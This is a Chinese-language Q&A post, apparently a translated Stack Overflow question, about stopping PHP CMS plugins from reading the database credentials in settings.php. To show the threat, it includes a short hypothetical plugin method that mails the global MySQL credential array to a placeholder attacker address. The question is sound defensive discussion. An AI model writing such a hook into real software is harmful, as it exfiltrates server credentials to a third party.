【发布时间】:2012-05-01 17:23:42
【问题描述】:
我有一个问题在我脑海中盘旋了很久。 我在一个 CMS 项目上,我真的不知道该怎么做: 我希望这个 cms 可以通过使用插件系统进行修改,直到现在都没有什么困难。 好吧,我现在有这个问题,如何保护管理员用户的 mysql 密码等变量/常量? 例如,在文件 settings.php 我有
$mysql = array("user" => "admin"...);
我怎样才能让一个类不读它? 一个简单的类(插件)就可以了
class myplugin extends plugin_container {
function badfunction() {
mail("my bad address", "data stolen", $GLOBALS["mysql"]);
}
一个简单的插件,通过这种方式,可以窃取用户的敏感数据。我该如何解决这个问题?
【问题讨论】:
-
你不能,而且试图找到一个技术解决方案是没有意义的。如果您信任插件代码在您的应用程序中执行,它必然可以访问当前环境。您应该检查第 3 方代码,以确保它没有试图窃取凭据或以其他方式危及您的服务器。
标签: php security plugins content-management-system